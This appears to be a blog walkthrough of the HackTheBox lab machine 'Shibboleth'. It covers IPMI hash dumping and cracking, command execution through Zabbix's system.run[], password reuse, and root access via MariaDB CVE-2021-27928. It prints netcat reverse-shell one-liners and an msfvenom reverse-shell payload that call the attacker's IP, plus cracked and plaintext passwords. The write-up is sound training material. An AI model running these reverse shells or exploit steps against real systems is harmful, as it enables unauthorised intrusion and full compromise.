Shibboleth - HackTheBox
Shibboleth Machine(10.10.11.124)
Info:
This was a medium linux box which aimed at teaching players about zabbix, mariadb command injection CVE and password reuse vulnerability.
Recon:
Starting with port scan, only one port is shown open, we can always run full port scan in background.
rustscan -a 10.10.11.124 -u 5000`
PORT STATE SERVICE REASON
80/tcp open http syn-ack
UDP port scan
As rustscan supports only TCP we will use nmap for UDP scanning.
sudo nmap -sU 10.10.11.124:
PORT STATE SERVICE
623/udp open asf-rmcp
This port is used in remote remote monitoring systems. Running better nmap scan on it
Let's add shibboleth.htb to our hosts file and also run vhost scanning in background.
ffuf -u http://shibboleth.htb/ -w ~/wordlist/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.shibboleth.htb" -fc 302
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://shibboleth.htb/
:: Wordlist : FUZZ: /home/ubuntu/wordlist/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.shibboleth.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 302
________________________________________________
monitor [Status: 200, Size: 3689, Words: 192, Lines: 30, Duration: 303ms]
monitoring [Status: 200, Size: 3689, Words: 192, Lines: 30, Duration: 425ms]
zabbix [Status: 200, Size: 3689, Words: 192, Lines: 30, Duration: 418ms]
:: Progress: [4989/4989] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:43] :: Errors: 0 ::
Let's add these hosts to our /etc/hosts file as well.
Each one of them have same landing page. zabbix.shibboleth.htb, monitor.shibboleth.htb, monitoring.shibboleth.htb.
Where google describe zabbix as "Zabbix is an open-source software tool to monitor IT infrastructure such as networks, servers, virtual machines, and cloud services. Zabbix collects and displays basic metrics".
Directory and file fuzzing doesn't reveal much other than common files like index.html, assets, contact etc.
Foothold: IPMI hash dump
As hacktricks says, we can retrieve default user's hashed password using metasploit module scanner/ipmi/ipmi_dumphashes
It dumps the Administrator user's hash let's crack that with hashcat. You can specify output format in metasploit as well. Manually you can put just hash without username in a file. i cracked using hashcat on google colab
!hashcat/hashcat "01c82d308205000004872b9f98e0052b521984be95a86bd5a70c5d5a69e7ab29e42e1849a8a359b1a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:4ae0c52b06606c6407c0a16a0bf117ffc9d9e6a1" wordlists/rockyou.txt
It tells the password,
let's login to zabbix using that.
Getting reverse shell from zabbix:
PS: As of today(31 March 2022) while writing this blog , i searched for zabbix version 5.0.17 exploit and there is a Authenticated CVE which works pretty well. But that is not the intended path as box was released in 2021 and this exploit is dropped on March 9th 2022.
I remember first time i did this machine i searched how to execute commands with zabbix and found this video. Basically using zabbix agent we can execute commands on system.
Got to hosts and create a new item
And using system.run[] in zabbix agent we can execute arbitrary command. Reading little bit of docs we can find it runs in 2 modes wait & nowait, where wait is default.
Create items with wait mode
system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.4 8083 >/tmp/f]
and i got the shell and it dies instantly.
While asking for help earlier i learned that you can start a process in a new session, which won't be killed by zabbix, using setsid command.
setsid rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.4 8083 >/tmp/f
setsid would keep your shell alive. But let's try this with nowait once.
But same problem persist. So let's switch to setsid payload and it works successfully.
Let's upgrade to tty shell
Reading apache2 conf file, we can see zabbix root directory is /usr/share/zabbix
Also note that monitor & monitoring vhost are just alias for zabbix only.
Lateral Movement: password reuse
I started enumerating the box with linpeas, and found some interesting path like /etc/zabbix and /var/log/zabbix which has content related to zabbix. I started hunting password for zabbix database but couldn't find it as it isn't in /usr/share/zabbix. And conf files in /etc/zabbix aren't redable by zabbix user which can have password as suggested by few google searches.
But thing was that we already have a password which we cracked earlier for Administrator user. Let's try that
su ipmi-svc
Password: ilovepumkinpie1
Privilege Escaltion: CVE-2021-27928 exploit
Now from /etc/zabbix/zabbix_server.conf file we can also read database password
DBUser=zabbix
DBPassword=bloooarskybluh
Let's login using these creds, and it tells mariadb version
Google this version number and it is vulnerable to CVE-2021-27928. Accordng to description user can
inject command by modifying wsrep_provider library. let's follow these steps. Also if you wan to write your own shared library in c and compile it, you can find details here.
Create a malicious shared library file using msfvenom
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.4 LPORT=8084 -f elf-so -o exploit.so
Transfer this to machine using python webserver. I like using updog for this
Execute the payload by specifying the -e flag , by default host(-h) is set to localhost.
mysql -u zabbix -p -e 'SET GLOBAL wsrep_provider="/tmp/exploit.so";'
on my listener,
As mariadb was running as root(uid=0) , that's why we get our shell in root's context
And that's how we get root on this machine.
Thanks for reading, feedbacks are welcome and don't forget to cleanup your scripts and exploits before leaving the machine.
Twitter: Avinashkroy
Comments
Post a Comment